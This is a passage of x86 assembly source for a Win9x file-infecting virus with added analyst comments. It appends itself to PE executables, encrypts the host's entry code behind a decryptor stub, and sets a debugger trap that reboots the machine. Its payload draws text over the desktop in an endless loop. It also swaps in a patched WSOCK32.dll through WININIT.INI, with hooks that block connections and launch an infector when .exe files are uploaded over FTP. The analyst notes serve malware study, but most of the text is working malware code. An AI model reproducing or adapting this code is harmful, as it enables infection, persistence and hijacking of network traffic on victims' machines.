mov [esi+08h],eax                   ; New VirtualSize (same value)

pop edx                             ; EDX = Raw pointer to the
                                    ; end of section
cmp dword ptr [ebp+go_wsock],1
je @skip_thiss

mov eax,[esi+10h]                   ; EAX = New SizeOfRawData
add eax,[esi+0Ch]                   ; EAX = EAX+VirtualAddress
mov [edi+50h],eax                   ; EAX = New SizeOfImage

@skip_thiss:
or dword ptr [esi+24h],0A0000020h   ; Characteristics |= CNT_CODE | MEM_EXECUTE | MEM_WRITE

mov dword ptr [edi+4ch],"deiW"                       ; infection marker

lea esi,[ebp+v_start]                 ; ESI = Ptr to virus_start
xchg edi,edx                          ; EDI = Raw ptr after last
mov dword ptr [ebp+moj_address],edi   ; raw offset of the appended code (read by make_real)

                           ; section
add edi,dword ptr [ebp+fMapReal]       ;EDI = Normalized ptr
mov ecx,virussize                      ;ECX = Size to copy


cmp dword ptr [ebp+go_wsock],1
jne @write_it
mov ecx,hooksize                       ; wsock32 mode: copy the hook instead


lea esi,[ebp+start_h]


@write_it:

cmp dword ptr [ebp+go_wsock],1
je step_0
call @crypt_my_body                    ; encrypting copy of the body (outside this view)
jmp step_1
step_0: rep movsb                           ; plain copy of the hook


step_1:
cmp dword ptr [ebp+go_wsock],1
jne _Git
ret                                    ; wsock32 mode: the caller finishes up

_Git:
jmp _God

; Part 3: clean-up paths.  _No_infect is reached for hosts that already
; carry the marker; _God/_Out3/_Out2/_Out are the unwind points used by
; the earlier steps and by MapF/VMapF.
_No_infect:
cmp dword ptr [ebp+go_wsock],1
jne @zw
mov edx,-1
jmp _God

@zw:
mov ecx,dword ptr [ebp+finddata.nFileSizeLow]   ; = fSize (set in _Oblicz)
call @zostaf                        ; truncate back to that size
dec dword ptr [ebp+ic]              ; ic is decremented although @0dal was not reached for this file


_God:

 mov eax,[ebp+offset fMapReal]      ; unmap the view
 push eax
 mov eax, [ebp+_UnmapViewOfFile]
 call eax



_Out3:
push dword ptr [ebp+fHndMap]        ; close the mapping object
call dword ptr [ebp+_CloseHandle]





_Out2:
lea eax,[ebp+F1]                    ; put the FILETIMEs read at @infect back;
push eax                            ; fHnd is not assigned in this view, confirm
lea eax,[ebp+F2]                    ; which handle is intended
push eax
lea eax,[ebp+F3]
push eax
push dword ptr [ebp+fHnd]
call dword ptr [ebp+_SetFileTime]

push dword ptr [ebp+offset fileHandle]
call dword ptr [ebp+_CloseHandle]

cmp dword ptr [ebp+go_wsock],1
je @@@z
push 1                              ; bFailIfExists
lea eax,[ebp+santa]                 ; destination path (outside this view)
push eax
lea eax,[ebp+finddata.cFileName]
push eax
call dword ptr [ebp+_CopyFileA]     ; copy of the processed file

@@@z:
; restore the attributes
push dword ptr [ebp+fileAtrib]
lea eax,[ebp+finddata.cFileName]
push eax
call dword ptr [ebp+_SetFileAttributesA]
mov edx,-1


_Out:

ret



; Round EAX up to the next multiple of ECX.  When EAX is already a
; multiple (remainder 0) a full ECX is still added.  EDX is preserved,
; ECX is clobbered.
Align_:
        push    edx
        xor     edx,edx
        push    eax
        div     ecx                 ; EDX = EAX mod ECX
        pop     eax
        sub     ecx,edx             ; distance to the next boundary
        add     eax,ecx
        pop     edx
        ret





; Truncate fileHandle to ECX bytes: SetFilePointer(h, ECX, NULL, FILE_BEGIN)
; followed by SetEndOfFile(h).
@zostaf:
xor  eax,eax
push eax                            ; dwMoveMethod = FILE_BEGIN
push eax                            ; lpDistanceToMoveHigh
push ecx                            ; lDistanceToMove
push dword ptr [ebp+fileHandle]
call dword ptr [ebp+offset _SetFilePointer]

push dword ptr [ebp+fileHandle]
call dword ptr [ebp+offset _SetEndOfFile]
ret

;**************************
;ECX - size to map
;**************************
; CreateFileMappingA(fileHandle, NULL, PAGE_READWRITE, 0, ECX, NULL); the
; handle goes to fHndMap.  A size larger than the file extends the file.
; On failure this jumps straight to _Out2 in @infect without popping its
; own return address.
MapF:
xor eax,eax
push eax                            ; lpName
push ecx                            ; dwMaximumSizeLow
push eax                            ; dwMaximumSizeHigh
push 00000004h                      ; PAGE_READWRITE
push eax                            ; lpAttributes
push dword ptr [ebp+fileHandle]
call dword ptr [ebp+_CreateFileMappingA]
cmp eax,0
je _Out2
mov dword ptr [ebp+fHndMap],eax
ret


; MapViewOfFile(fHndMap, FILE_MAP_READ OR FILE_MAP_WRITE, 0, 0, ECX).
; The view base is returned in EAX and ESI and stored in fMapReal.  On
; failure jumps to _Out3 in @infect without popping its return address.
VMapF:
xor eax,eax
push ecx                            ; dwNumberOfBytesToMap
push eax                            ; dwFileOffsetLow
push eax                            ; dwFileOffsetHigh
push 00000004h OR 00000002h         ; FILE_MAP_READ OR FILE_MAP_WRITE
push dword ptr [ebp+fHndMap]
call dword ptr [ebp+_MapViewOfFile]
cmp eax,0
je _Out3
mov dword ptr [ebp+fMapReal],eax
mov esi,eax
ret

; Stub: returns immediately (no relocation handling in this build).
@TRY_RELOC:
ret

; Anti-debug check (not called in this build, see the commented-out call
; in @GET_APIS).  If IsDebuggerPresent() is non-zero, or the device name
; at sice9x can be opened, execution is diverted into the immediate of
; 'mov eax,909119cdh' (bytes CD 19 = int 19h, a BIOS warm reboot on
; Win9x, as the header describes).  Otherwise returns normally.
@debug_trap: ;ret
call dword ptr [ebp+_IsDebuggerPresent]
or eax,eax
jz _leave_me
ble: mov eax, 909119cdh               ;int 19h! (the jump below lands one byte into this instruction)
     jmp $ - 4


_leave_me:
lea eax,[ebp+sice9x]                ; device name string (outside this view)
push    00000000h                   ; hTemplateFile
push    00000080h                   ; FILE_ATTRIBUTE_NORMAL
push    00000003h                   ; OPEN_EXISTING
push    00000000h                   ; lpSecurityAttributes
push    00000001h                   ; FILE_SHARE_READ
push    0C0000000h                  ; GENERIC_READ OR GENERIC_WRITE
push    eax
call    dword ptr [ebp+_CreateFileA]

inc eax
jz leave_it                         ; could not open: no debugger device present
dec eax

push eax
call dword ptr [ebp+_CloseHandle]

lea eax,[ebp+to_ja]                 ; message for the debugger (string outside this view)
push eax
call dword ptr [ebp+_OutputDebugStringA]
mov eax, 909119cdh                  ;int 19h!
jmp $ - 4
jmp @EXIT                           ; not reached

leave_it: ret



;************************************************************************************************
;PayL0ad ;]
;this is very simple coz i don't have any time to make it perfect
;************************************************************************************************
; Payload state, reached via [ebp+...] from make_it_real and draww.
payload:
p_x dd 0            ; current text x position (pixels)
p_y dd 0            ; current text y position

hdc dd 0            ; device context of the desktop window
wh dd 0             ; desktop window handle

screen_x dd 0       ; SM_CXSCREEN
screen_y dd 0       ; SM_CYSCREEN


font  dd 0          ; handle returned by CreateFontA (c_font)


color: dd 15466513  ; four COLORREF values cycled by draww
       dd 15474944
       dd 15484928
       dd 15496448


; Payload entry.  Resolves the names in @GDI_APIZ (gdi32 first, user32
; after the 77h marker) into the address table at @GDI_APIZA (outside this
; view), reads the screen size, creates the font and then draws the 'logo'
; text over the desktop in a loop that never terminates.
make_it_real:
pay:

lea esi,[ebp+@GDI_APIZ]             ; name list
lea edi,[ebp+@GDI_APIZA]            ; address slots (filled by stosd)
lea ebx,[ebp+gdi32]                 ; library name string

change_l:
push ebx
call dword ptr [ebp+_LoadLibraryA]
mov ebx,eax                         ; EBX = module handle


@find_a:
push esi
push ebx
call dword ptr [ebp+_GPA]
stosd

check_a:
inc esi                             ; advance to the NUL
cmp byte ptr [esi],0
jne check_a

inc esi
cmp byte ptr [esi],77h              ; 77h: remaining names come from user32
je change_ll

cmp byte ptr [esi],69h              ; 69h: end of list
je @go_pay

jmp @find_a


change_ll: inc esi
           lea ebx,[ebp+user32]
           jmp change_l


@go_pay:


push 1                                  ; SM_CYSCREEN
call dword ptr [ebp+_GetSystemMetrics]  ;user
mov dword ptr [ebp+screen_y],eax

push 0                                  ; SM_CXSCREEN
call dword ptr [ebp+_GetSystemMetrics]	;user
mov dword ptr [ebp+screen_x],eax

call c_font
lea esi,logo                        ; text to draw (outside this view); link-time address, no EBP delta
xor ebx,ebx                         ; colour table offset for draww

l:
call dword ptr [ebp+_GetDesktopWindow] ;user
mov dword ptr [ebp+wh],eax

push dword ptr [ebp+wh]
call dword ptr [ebp+_GetWindowDC]      ;user
mov dword ptr [ebp+hdc],eax            ; DC of the whole desktop, so the text shows over every window

call draww                             ; one character

push dword ptr [ebp+hdc]
push dword ptr [ebp+wh]
call dword ptr [ebp+_ReleaseDC]        ;user

jmp l                                  ; forever

; Draw the next character of 'logo' at (p_x, p_y) in the next of the four
; colours, then advance the position: 13 px per character, new line of 15
; px at the right edge, back to the top when p_y reaches screen_y.  ESI
; (string cursor) and EBX (colour offset) carry state between calls.
draww:
xor eax,eax
lodsb
lea edi,[ebp+jed]                   ; jed: one-character buffer handed to TextOutA
stosb
cmp al,0
jne @wypisz
lea esi,[ebp+logo]                  ; end of string: start again
lodsb
lea edi,[ebp+jed]
stosb

@wypisz:
cmp al,'i'
jne @dik
add dword ptr [ebp+p_x],6           ; an 'i' is drawn 6 px further right

@dik:
push dword ptr [ebp+font]
push dword ptr [ebp+hdc]
call dword ptr [ebp+_SelectObject]   ;gdi

push 0                               ; background mode 0
push dword ptr [ebp+hdc]
call dword ptr [ebp+_SetBkMode]      ;gdi

mov eax,dword ptr [ebp+color+ebx]    ; next colour
add ebx,4
cmp ebx,4*4
jl @n1
xor ebx,ebx                          ; wrap after the fourth

@n1:
push eax
push dword ptr [ebp+hdc]
call dword ptr [ebp+_SetTextColor]    ;gdi

push 1                               ; cbString = 1
lea eax,[ebp+jed]
push eax
push dword ptr [ebp+p_y]
push dword ptr [ebp+p_x]
push dword ptr [ebp+hdc]
call dword ptr [ebp+_TextOutA]        ;gdi

mov eax,dword ptr [ebp+screen_y]
cmp dword ptr [ebp+p_y],eax
jae chang_g                          ; bottom reached: back to the top
mov eax,dword ptr  [ebp+screen_x]
add dword ptr [ebp+p_x],13           ; next cell
cmp dword ptr [ebp+p_x],eax
jle spp
mov dword ptr [ebp+p_x],0            ; right edge: next line
add dword ptr [ebp+p_y],15
jmp spp

chang_g: mov dword ptr [ebp+p_y],0

spp:
push 50                              ; 50 ms between characters
call dword ptr [ebp+_Sleep]
ret

; CreateFontA(9, 9, 0,0,0,0,0,0,0,0,0,0,0, famil): a 9x9 font with the
; face name at 'famil' (outside this view).  Both 'famil' and 'font' are
; addressed by their link-time address here, without the EBP delta used
; elsewhere.
c_font:
push offset famil                   ; lpszFace
xor eax,eax
push eax                            ; fdwPitchAndFamily
push eax                            ; fdwQuality
push eax                            ; fdwClipPrecision
push eax                            ; fdwOutputPrecision
push eax                            ; fdwCharSet
push eax                            ; fdwStrikeOut
push eax                            ; fdwUnderline
push eax                            ; fdwItalic
push eax                            ; fnWeight
push eax                            ; nOrientation
push eax                            ; nEscapement
push 9                              ; nWidth
push 9                              ; nHeight
call dword ptr [ebp+_CreateFontA]     ;gdi
mov [font],eax
ret




; Name table walked by make_it_real: NUL-separated names, a 77h byte
; switches the source library from gdi32 to user32, 69h ends the list.
@GDI_APIZ:  db "CreateFontA",0
            db "TextOutA",0
            db "SetBkMode",0
            db "SetTextColor",0
            db "SelectObject",0
            db 77h                  ; switch to user32
            db "GetSystemMetrics",0    ;user32 part X-D
            db "GetDesktopWindow",0
            db "GetWindowDC",0
            db "ReleaseDC",0
            db 69h                  ; end of list


;************************************************************************************************
;Handle this sucker ;]
;************************************************************************************************
; Encrypt the host's entry section inside the file mapping (layer 2 of
; the scheme described in the header).  Finds the section containing
; AddressOfEntryPoint, marks it code/executable/writable, records the raw
; offset (e_where) and length (e_bytes) for @uncrypt, and XORs the bytes
; with the low byte of key_next, stopping at the first run of five zero
; bytes.  Sets help_virus=1 when the section is not named '.tex'/'CODE'.
@crypt_host:
;push dword ptr [ebp+key_next]
pushad

mov eax,dword ptr [ebp+fMapReal]
mov esi,[eax+3ch]
add esi,eax                        ;ESI => PE HEADER
mov edi,esi

xor eax,eax
mov ax,[esi + 06h]                 ; EAX = NumberOfSections
mov ecx,0h                         ; (0 here, so ESI stays at the PE header)

add esi,ecx                         ; Normalize
add esi,78h                         ; Ptr to dir table
mov edx,[edi+74h]                   ; EDX = number of data-directory entries
shl edx,3                           ; EDX = EDX*8
add esi,edx                         ; ESI = Ptr to the FIRST section header

mov ecx,[edi+28h]                   ; ECX = AddressOfEntryPoint (RVA)

search_it:
mov ebx,dword ptr [esi+0ch]         ; VirtualAddress
add ebx,dword ptr [esi+08h]         ; + VirtualSize = end of this section



inc eax
cmp ecx,ebx                         ; entry point before the section end: this one
jb sfound
dec eax                             ; the inc/dec pair leaves EAX unchanged, so this
jz @e_error                         ; jz only fires when NumberOfSections was zero
add esi,28h                         ; next section header
jmp search_it

sfound:
test dword ptr [esi+24h],10000000h   ; IMAGE_SCN_MEM_SHARED: leave alone
jnz @e_error
or dword ptr [esi+24h],0A0000020h    ; CNT_CODE | MEM_EXECUTE | MEM_WRITE

cmp dword ptr [esi],'xet.'           ; section name '.tex'(t)
je _01
cmp dword ptr [esi],'EDOC'           ; or 'CODE'
je _01
mov dword ptr [ebp+help_virus],1     ; anything else: helper mode



_01:
push eax
;STEP GET RAW ADDRESS

mov edx,ecx
sub edx,dword ptr [esi+0ch]          ; RVA - VirtualAddress
add edx,[esi+014h]                   ; + PointerToRawData = raw offset of the entry point
mov dword ptr [ebp+e_where],edx

push edx
mov edx,[esi+010h]                   ; SizeOfRawData
mov dword ptr [ebp+e_bytes],edx      ; provisional count, trimmed at @crypted
pop edx

add edx,dword ptr [ebp+fMapReal]     ; EDX -> first byte to encrypt in the view

mov ecx,[esi+10h]                    ; loop count = SizeOfRawData
mov dword ptr [ebp+e_god],0

mov dword ptr [ebp+firstk],1h        ; flag set around key generation (consumer outside this view)

pushad

lea edi,[ebp+key_next]               ; @combine_key stores through EDI

call @GGEN_KEY
call @combine_key

mov eax,dword ptr [ebp+key_next]

popad
mov dword ptr [ebp+firstk],0

push esi
mov eax,dword ptr [ebp+key_next]     ; AL = key byte
xor ebx,ebx


@loop_it:
;=> IF 5 BYTES ARE ZEROZ THEN DON'T CRYPT BELOW (treated as padding)
cmp byte ptr [edx],00h
jne @go_
cmp byte ptr [edx+1],00h
jne @go_
cmp byte ptr [edx+2],00h
jne @go_
cmp byte ptr [edx+3],00h
jne @go_
cmp byte ptr [edx+4],00h
je @crypted


@go_:
xor byte ptr [edx],al

inc edx
loop @loop_it
jmp @e_out

@crypted:
pop esi
mov eax,dword ptr [ebp+e_bytes]
sub eax,ecx                          ; bytes actually encrypted = total - remaining
mov dword ptr [ebp+e_bytes],eax

jmp @e_out


@e_error:


@e_out:
pop eax
cmp dword ptr [ebp+help_virus],1
je @mute_other_virus                  ; helper mode continues there
popad
ret

;ENTRY: EDI - BUFFER
; Derive the two keys from key/key2 (presumably filled by @GGEN_KEY,
; outside this view):  [EDI] = key2  (callers pass EDI = &key_next),
; key_main = key2 + key.  Returns with EDI just past key_main.
@combine_key:
mov eax,dword ptr [ebp+key2]
stosd
add eax,dword ptr [ebp+key]
lea edi,[ebp+key_main]
stosd
ret

;**************************************************************************
;UNCRYPT                                                                *|*
;**************************************************************************
;Decryptor stub that is copied into the host: @mute_other_virus does a
;rep movsb of 'helper' bytes starting at this label, so the data words
;below travel together with the code (helper is defined outside this
;view; presumably it is @helper_end - @uncrypt).
;When it runs inside the host it XORs e_bytes bytes, starting at
;imagebase+hosteip, with the low byte of key_next - the inverse of the
;single-byte XOR applied by the encrypt routine above.
;  czy_je = 0  : popad; ret to whoever called the stub
;  czy_je <> 0 : popad and jump to imagebase+hosteip (the decoded code)
;Analyst note: the call/pop delta, a byte-wise XOR loop and the parameter
;words directly behind the code are the recognisable shape of this stub.
@uncrypt:

call delta_e
delta_e: pop ebp
         sub ebp,offset delta_e        ; EBP = load delta for ebp-relative data

pushad
mov edx,dword ptr [ebp+imagebase]
add edx,dword ptr [ebp+hosteip]        ; EDX = address of the encoded bytes

mov ecx,dword ptr [ebp+e_bytes]        ; ECX = number of bytes to decode

xor ebx,ebx                            ; EBX is not read by the loop below
mov eax,[ebp+key_next]                 ; only AL is used as the key

@lloop_it:
xor byte ptr [edx],al
inc edx
loop @lloop_it

f_e:                                   ; label not referenced in this view
cmp dword ptr [ebp+czy_je],0
jne @helper_endd
popad
ret

@helper_endd: 
popad

mov eax,dword ptr [ebp+hosteip]
add eax,dword ptr [ebp+imagebase]
jmp eax                                ; continue in the decoded host code


;Stub parameters; the encrypt routine above writes e_where/e_bytes/e_god,
;@mute_other_virus sets czy_je = 1 just before copying the stub.
czy_je  dd 0                           ; non-zero: jump to host instead of ret
e_bytes dd 0                           ; byte count to decode
e_where dd 0                           ; raw file offset of the encoded range
e_god   dd 0                           ; zeroed by the infector, not read here


hosteip   dd 0                         ; RVA where decoding starts (set elsewhere)
imagebase dd 0                         ; host image base (set elsewhere)
key_next  dd 0                         ; XOR key; only the low byte is used


@helper_end: nop                       ; end of the copied stub

;***********************************************************
;Appends the @uncrypt stub to the end of the host's last section and
;moves AddressOfEntryPoint onto it. Entered by a jump from the encrypt
;routine above when help_virus = 1 (entry-point section not named .text
;or CODE - presumably a host whose entry point already lives elsewhere);
;the popad/ret at the end stands in for the one the normal @e_out path
;would have executed.
;Analyst note: an infected file shows its entry point at the very end of
;the last section, and that section's raw/virtual size replaced by the
;aligned value computed below.
@mute_other_virus:
mov eax,dword ptr [ebp+fMapReal]      ; EAX = base of the mapped file
mov esi,[eax+3ch]                     ; e_lfanew
add esi,eax                      ;ESI => PE HEADER               
mov edi,esi

xor eax,eax
mov ax,[esi + 06h]                  ;load number of sections
mov ecx,28h                         ;28 bytes for each section header
dec eax                             ;seeking for last,...
mul ecx                             ;and mul it
add esi,eax                         ; Normalize
add esi,78h                         ; Ptr to dir table
mov edx,[edi+74h]                   ; EDX = n§ of dir entries (NumberOfRvaAndSizes)
shl edx,3                           ; EDX = EDX*8
add esi,edx                         ; ESI = Ptr to last section

mov edx,[esi+10h]                   ; EDX = SizeOfRawData
mov ebx,edx                         ; EBX = EDX
add edx,[esi+14h]                   ; EDX = EDX+PointerToRawData (raw end of last section)

push edx                             ; Preserve EDX

mov eax,ebx                         ; EAX = EBX
add eax,[esi+0Ch]                   ; EAX = EAX+VA Address
                                                ; EAX = New EIP
mov [edi+28h],eax                   ; Change the new EIP (AddressOfEntryPoint)
mov dword ptr [ebp+NewEIP],eax      ; Also store it


mov eax,dword ptr [ebp+fSize]
add eax,helper                      ; helper = stub size (defined outside this view)
mov ecx,[edi+3Ch]                   ; ECX = FileAlignment
call Align_                         ; Align_ is not in this view; presumably rounds EAX up to ECX

mov [esi+10h],eax                   ; SizeOfRawData of last section
mov [esi+08h],eax                   ; VirtualSize of last section

pop edx                             
                                    
mov eax,[esi+10h]                   
add eax,[esi+0Ch]                   
mov [edi+50h],eax                   ; SizeOfImage = last VA + new size

lea esi,[ebp+@uncrypt]                 ; ESI = Ptr to virus_start (the stub)
xchg edi,edx                           ; EDI = Raw ptr after last
add edi,dword ptr [ebp+fMapReal]    ;EDI = Normalized ptr
mov ecx,helper 
mov dword ptr [ebp+czy_je],1        ; stub will jump to hosteip instead of ret
rep movsb                           ; copy the stub behind the last section

push dword ptr [ebp+offset fMapReal]
call dword ptr [ebp+_UnmapViewOfFile]

push dword ptr [ebp+fHndMap]
call dword ptr [ebp+_CloseHandle]

mov ecx,dword ptr [ebp+fSize]
add ecx,helper
call @zostaf                        ; not in this view; called with ECX = new file size


push dword ptr [ebp+fHnd]
call dword ptr [ebp+_CloseHandle]

popad
ret


;************************************************************************************************
;Wsock32 hooker!!!
;************************************************************************************************
;Installs the Winsock hooks through a modified copy of WSOCK32.dll:
;  1. <sysdir>\WSOCK32.dll is copied to <windir>\WZZOCK32.dll (fails if
;     the copy already exists, in which case the routine just returns),
;  2. the copy is run through @infect with go_wsock = 1, then @go_export
;     and _God are called on its mapping (both outside this view),
;  3. a [rename] entry is written to WININIT.INI so that the copy replaces
;     the original WSOCK32.dll at the next Win9x boot.
;Analyst note: WZZOCK32.dll in the Windows directory, and a WININIT.INI
;[rename] line whose key is the system WSOCK32.dll path, are the file-system
;indicators of this routine.
@wsockz:
mov eax,dword ptr [ebp+_GetSystemDirectoryA]   ; overwritten below before use
mov ebx,dword ptr [ebp+_GPA]                   ; not read in this routine

push 260
lea eax,[ebp+sysDIR]
push eax
call dword ptr [ebp+_GetSystemDirectoryA]      ; sysDIR = system directory

lea eax,[ebp+offset winDIRr]
push 260
push eax
call dword ptr [ebp+_GetWindowsDirectoryA]     ; winDIRr = Windows directory



lea edi,[ebp+sysDIR]
lea esi,[ebp+wsock]
call strcat                                    ; sysDIR += "\WSOCK32.dll"

lea edi,[ebp+winDIRr]
lea esi,[ebp+nowe]
call strcat                                    ; winDIRr += "\WZZOCK32.dll"

push 1                                         ; bFailIfExists
lea eax,[ebp+winDIRr]
push eax                                       ; lpNewFileName
lea eax,[ebp+sysDIR]
push eax                                       ; lpExistingFileName
call dword ptr [ebp+_CopyFileA]
cmp eax,0
je bye                                         ; copy failed (or already there)


lea edi,[ebp+finddata.cFileName]
lea esi,[ebp+winDIRr]
call strcat                                    ; presumably @infect reads its target from cFileName - not visible here


mov dword ptr [ebp+go_wsock],1

push dword ptr [ebp+hosteip]                   ; @infect rewrites these; keep the host's values
push dword ptr [ebp+imagebase] 
call @infect
pop dword ptr [ebp+imagebase]
pop dword ptr [ebp+hosteip]
cmp edx,-1                                     ; @infect reports failure with EDX = -1
je bye

mov dword ptr [ebp+capis],0
mov eax,dword ptr [ebp+fMapReal]
mov dword ptr [ebp+wsock_h],eax                ; mapping of the copied DLL

call @go_export                                ; outside this view

call _God                                      ; outside this view


mov dword ptr [ebp+go_wsock],0

lea eax,[ebp+WININIT]
push eax                                       ; lpFileName = "WININIT.INI"
lea eax,[ebp+winDIRr]
push eax                                       ; lpString   = <windir>\WZZOCK32.dll
lea eax,[ebp+sysDIR]
push eax                                       ; lpKeyName  = <sysdir>\WSOCK32.dll
lea eax,[ebp+rename]
push eax                                       ; lpAppName  = "rename"
call dword ptr [ebp+_WritePrivateProfileStringA]




bye: ret


;************************************************************************************************
;STRCAT !!! It's smaller and faster (i think - but not optimized with repz)
;ENTRY:
;edi - base buffer
;esi - string to append
;************************************************************************************************
;Appends the NUL-terminated string at ESI to the NUL-terminated string at
;EDI. The terminating NUL of the appended string is NOT written, so the
;result is terminated only if the destination buffer was already zero
;behind it. Clobbers EAX, ESI and EDI (EDI ends after the last byte copied).
strcat: 
push esi
mov esi,edi
sstrcat: lodsb                       ; walk the base string to its NUL
cmp al,0
jne sstrcat
dec esi                              ; back onto the NUL
mov edi,esi                          ; EDI = end of base string
pop esi
cat_it: 
lodsb
cmp al,0
je le                                ; stop at NUL without storing it
stosb
jmp cat_it
le:ret


;************************************************************************************************
;Filez with 'a','A','E','e','v','V' at start - wouldn't be infected ;]
;************************************************************************************************

;Name filter for the current find result. Returns EDI = 1 if the FIRST
;character of finddata.cFileName is one of a/A/E/e/v/V, else EDI = 0.
;Only one character is examined (there is no loop back to _letra).
;Clobbers EAX and ESI.
@bad_name:
xor edi,edi
lea esi,[ebp+finddata.cFileName]
_letra:
lodsb 
cmp al,'a'
je error_a
cmp al,'A'
je error_a
cmp al,'E'
je error_a
cmp al,'e'
je error_a
cmp al,'v'
je error_a
cmp al,'V'
je error_a
ret

error_a: inc edi                     ; EDI = 1 -> caller skips this file
         ret

;================================================================================================
;BYTE CRYPTING ENGINE ;] SIMPLE BUT FACKING AVERZ 
;================================================================================================

;Picks a small key from GetTickCount.
;  firstk = 1 : EBX = 40h, key2 is zeroed first, only key2 receives the result
;  otherwise  : EBX = 55h, key is zeroed first, key and key2 both receive it
;The value stored is (division remainder) + 1, so it is never 0.
;Clobbers EAX, EBX, EDX.
@GGEN_KEY:
cmp dword ptr [ebp+firstk],1
jne @go__
mov ebx,40h
mov dword ptr [ebp+key2],0h
jmp GEN_KEY

@go__:
mov dword ptr [ebp+offset key],0000000h   
mov ebx,55h
GEN_KEY: 
call dword ptr [ebp+_GetTickCount]
idiv ebx                             ;remainder in EDX ;) a much simpler algorithm for
cmp edx,ebx                          ;random numbers than the T-2000/Immortal Riot one
jae GEN_KEY                          ;retry while the remainder is not below EBX
inc edx                              ;WE HAVE TO ENCODE SOMETHING, AT LEAST BY +1
cmp dword ptr [ebp+firstk],1
je @go___
mov dword ptr [ebp+offset key],edx  
@go___: mov dword ptr [ebp+offset key2],edx
ret



;Byte-add string obfuscator.
;ENTRY: ESI = source, EDI = destination, EDX = key. lodsb/stosb advance in
;lock-step, so with ESI = EDI at entry the transform is in place.
;Reads until a 07h byte (the same terminator that closes APIList and
;TO_CRYPT_DATA). 00h bytes are skipped unchanged (EDI stepped past them),
;every other byte gets CL added and is stored. The 07h itself is not
;written. Clobbers EAX, ECX, ESI, EDI.
@CRYPT_BYTEZ:
mov ecx,edx

Try_crypt:       
lodsb                                ;read the damn byte :P it's in AL
cmp al,0
je _zero
cmp al,07h
je _retprog

_next: add al,cl
       stosb
       jmp Try_crypt

_zero: inc edi                       ; keep NUL separators as they are
       jmp Try_crypt

_retprog: ret




;Inverse of @CRYPT_BYTEZ: subtracts CL from every byte that is neither
;00h nor 07h, stops at 07h. The key is taken from [key] rather than EDX.
;ENTRY: ESI = source, EDI = destination (in place when equal).
;Clobbers EAX, ECX, ESI, EDI.
@UN_CRYPT_BYTEZ:
mov ecx,dword ptr [ebp+offset key]
Try_uncrypt: 
lodsb
cmp al,0h
je _zero0
cmp al,07h
je ret0


_next0: sub al,cl
        stosb
        jmp Try_uncrypt

_zero0: inc edi
        jmp Try_uncrypt


ret0: ret



;================================================================================================
;HOOKER DATA
;================================================================================================
;Replacement for connect() (start_h .. hook_end is the blob that gets
;placed into the patched WSOCK32 copy; how it is placed is not in view).
;Compares the first three octets of the destination address with every
;3-byte entry of the DENIED table. On a match it fails the call: last
;error = WSAHOST_NOT_FOUND, EAX = -1, nothing is sent. Otherwise the
;original connect is called with the caller's three arguments.
;Analyst note: on an affected machine connect() to any address in the
;listed blocks fails immediately with error 11001 - a behavioural sign
;that is visible without looking at the DLL.
start_h:
hooked_connect:
call get_delta                ; EAX = delta (load offset of this blob)


pushad


mov edx,[esp+(10*4)]       ; EDX = sockaddr (8 regs saved + retaddr + s)
mov ecx,[edx+(2*2)]        ; ip (sin_addr, bytes a.b.c.d as stored)
shl ecx,8                  ; last octet dropped; ECX = c,b,a,00

lea esi,[eax+DENIED]
mov edi,eax                ;save EAX in EDI

scan_denied:   lodsd                       ; a,b,c plus first byte of next entry
               dec esi                     ; step 3 bytes per entry
               shl eax,8                   ; same layout as ECX; ZF set at the 0,0,0 end marker
               jz TOC
               cmp ecx,eax
               jne scan_denied
               push WSAHOST_NOT_FOUND
               call dword ptr [edi+_WSASetLastError]
               popad                 
               push -1
               pop eax                     ; return SOCKET_ERROR
               jmp out_c               


TOC:                                   ;tHe oRgInal coNneCt ;]
popad                                  ; EAX = delta again
push    [esp+0Ch]                         ;int namelen
push    [esp+4+8]                         ;const struct sockaddr FAR*  name
push    [esp+8+4]                         ;SOCKET s
call    dword ptr [eax+a_connect]         ;call orginal connect!!!

out_c: retn 0Ch

;//////////////////////////////////////////////hooked send///////////////////////////////////////
;Replacement for send(). If the buffer starts with "STOR" (FTP upload)
;and the file name contains ".EXE"/".exe", the name is copied up to the
;CR, joined to GetCurrentDirectoryA() with a backslash, and
;"<santa> <cwd>\<name>" is handed to WinExec with SW_SHOWNORMAL before
;the original send runs. Every path ends in TOS (original send).
;Analyst note: a process started from the santa path with an FTP upload
;path as its only argument, right after a STOR command, is the runtime
;indicator of this hook. reset_err below is not referenced in this view.
hooked_send:
call get_delta                             ; EAX = delta
pushad
mov edi,eax                                ; EDI = delta
mov ebx,[esp+28h]                          ;20(PUSHAD)+8(FAR *buf)

mov eax,[ebx]                              ; first 4 bytes of the buffer

cmp eax,'ROTS'                             ;FTP: Storing a file ? ;) ("STOR" in memory)
je _ftp_store

TOS: 
popad                                     ;tHe oRgInaL sEnd  (EAX = delta)
push    [esp+10h]                         ;int flags
push    [esp+4+0Ch]                       ;int len
push    [esp+8+8]                         ;const char FAR * buf
push    [esp+0Ch+4]                       ;SOCKET s
call    dword ptr [eax+a_send]            ;call orginal send!!!


out_s: retn 10h 

_ftp_store:                               ;yeah! infect on tha fly
mov edx,[esp+28h]                         ;point to name =] 
add edx,5                                 ;skip STOR and one space (5 bytes)

mov esi,[esp+28h]
@loop:
lodsb
cmp al,'.'                                  ;find first dod
jne @loop

dec esi
mov esi,[esi]                               ;a exe file!?  (4 bytes from the '.')
cmp esi,'EXE.'
je try_it
cmp esi,'exe.'
je try_it
jmp TOS


try_it: 
mov ecx,edi                           ; ECX = delta
lea edi,[ecx+offset buff]
mov esi,edx                           ; ESI = file name after "STOR "
xor edx,edx
_l:
lodsb
cmp al,0dh                            ; copy the name up to the CR
je _end
stosb 
inc edx                               ; EDX = length copied
jmp _l

mov edi,edx                           ; unreachable (follows an unconditional jmp)

_end:
lea edx,[ecx+offset buff]
lea ebx,[ecx+offset inf_prog]

push ecx                              ;preserve ecx
push ebx                              ; lpBuffer = inf_prog
push 260                              ; nBufferLength
call dword ptr [ecx+gcd]              ;tricky ;] GetCurrentDirectory
                                      ;ftp clients use that to locate 
                                      ;file.
pop ecx                               ;load ecx

mov eax,edi
xor ebx,ebx
lea esi,[ecx+offset inf_prog]

_loop_1:                              ; EBX = strlen(inf_prog) + 1
lodsb
inc ebx
cmp al,0
jne _loop_1

_do:
lea edi,[ecx+offset inf_prog]        ;add \ to patch ;]
add edi,ebx
dec edi                               ; EDI = position of the NUL
mov al,'\'
stosb
lea esi,[ecx+offset buff]

_l2:                                 ;well optimised strcat
lodsb
cmp al,0
je _skipp
stosb
jmp _l2

_skipp:
lea esi,[ecx+offset santa]
